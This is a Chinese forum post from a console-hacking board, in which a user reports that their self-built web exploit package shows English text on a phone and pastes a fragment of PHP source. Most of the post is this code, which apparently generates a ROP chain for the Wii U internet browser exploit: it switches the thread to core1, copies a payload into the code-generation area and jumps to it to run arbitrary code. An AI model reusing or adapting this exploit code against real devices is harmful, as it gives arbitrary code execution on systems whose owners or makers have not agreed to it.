- 打卡等级:无名新人
- 打卡总天数:1
- 打卡月天数:0
- 打卡总奖励:15
- 最近打卡:2025-02-26 08:15:20
|
发表于 2016-5-3 20:05:30
|
显示全部楼层
本帖最后由 cfd1774147 于 2016-5-3 20:09 编辑
接84楼的话题 kd大
这是用非java 网页自建包(用的你的最新发布的) 用pc的就是你的那4个链接的图 用手机打开是一堆英文
); ropchain_appendu32($r28);//r28 ropchain_appendu32(0x0);//r29 ropchain_appendu32(0x0);//r30 ropchain_appendu32(0x0);//r31 ropchain_appendu32(0x0); ropgen_OSFatal($outstr); } function ropgen_switchto_core1() { global $ROP_OSGetCurrentThread, $ROP_OSSetThreadAffinity, $ROP_OSYieldThread, $ROP_CALLR28_POP_R28_TO_R31; ropgen_callfunc($ROP_OSGetCurrentThread, 0x0, 0x2, 0x0, 0x0, $ROP_OSSetThreadAffinity);//Set r3 to current OSThread* and setup r31 + the r28 value used by the below. ropchain_appendu32($ROP_CALLR28_POP_R28_TO_R31);//ROP_OSSetThreadAffinity(, 0x2); ropchain_appendu32($ROP_OSYieldThread);//r28 ropchain_appendu32(0x0);//r29 ropchain_appendu32(0x0);//r30 ropchain_appendu32(0x0);//r31 ropchain_appendu32(0x0); ropchain_appendu32($ROP_CALLR28_POP_R28_TO_R31); ropchain_appendu32(0x0);//r28 ropchain_appendu32(0x0);//r29 ropchain_appendu32(0x0);//r30 ropchain_appendu32(0x0);//r31 ropchain_appendu32(0x0); } function generateropchain_type1() { global $ROP_OSFatal, $ROP_Exit, $ROP_OSDynLoad_Acquire, $ROP_OSDynLoad_FindExport, $ROP_os_snprintf, $payload_srcaddr, $ROPHEAP, $ROPCHAIN; $payload_size = 0x20000;//Doesn't really matter if the actual payload data size in memory is smaller than this or not. $codegen_addr = 0x01800000; //$payload_srcaddr must be defined by the code including this .php. //ropgen_colorfill(0x1, 0xff, 0xff, 0x0, 0xff);//Color-fill the gamepad screen with yellow. //ropchain_appendu32(0x80808080);//Trigger a crash. //ropgen_OSFatal($codepayload_srcaddr);//OSFatal(); ropgen_switchto_core1();//When running under internetbrowser, only core1 is allowed to use codegen. Switch to core1 just in case this thread isn't on core1(with some exploit(s) it may already be one core1, but do this anyway). OSSetThreadAffinity() currently returns an error for this, hence this codebase is only usable when this ROP is already running on core1. ropgen_copycodebin_to_codegen($codegen_addr, $payload_srcaddr, $payload_size); //ropgen_colorfill(0x1, 0xff, 0xff, 0xff, 0xff);//Color-fill the gamepad screen with white. $regs = array(); $regs[24 - 24] = $ROP_OSFatal;//r24 $regs[25 - 24] = $ROP_Exit;//r25 $regs[26 - 24] = $ROP_OSDynLoad_Acquire;//r26 $regs[27 - 24] = $ROP_OSDynLoad_FindExport;//r27 $regs[28 - 24] = $ROP_os_snprintf;//r28 $regs[29 - 24] = $payload_srcaddr;//r29 $regs[30 - 24] = 0x8;//r30 The payload can do this at entry to determine the start address of the code-loading ROP-chain: r1+= r30. r1+4 after that is where the jump-addr should be loaded from. The above r29 is a ptr to the input data used for payload loading. $regs[31 - 24] = $ROPHEAP;//r31 ropgen_pop_r24_to_r31($regs);//Setup r24..r31 at the time of payload entry. Basically a "paramblk" in the form of registers, since this is the only available way to do this with the ROP-gadgets currently used by this codebase. ropchain_appendu32($codegen_addr);//Jump to the codegen area where the payload was written. //Setup the code-loading ROP-chain which can be used by the loader-payload, since the above one isn't usable after execution due to being corrupted. ropchain_appendu32(0x0); ropgen_copycodebin_to_codegen($codegen_addr, $payload_srcaddr, $payload_size); ropgen_pop_r24_to_r31($regs); ropchain_appendu32($codegen_addr); } ?>
|
|
[复制链接]
x 0
狗仔卡
显身卡
楼主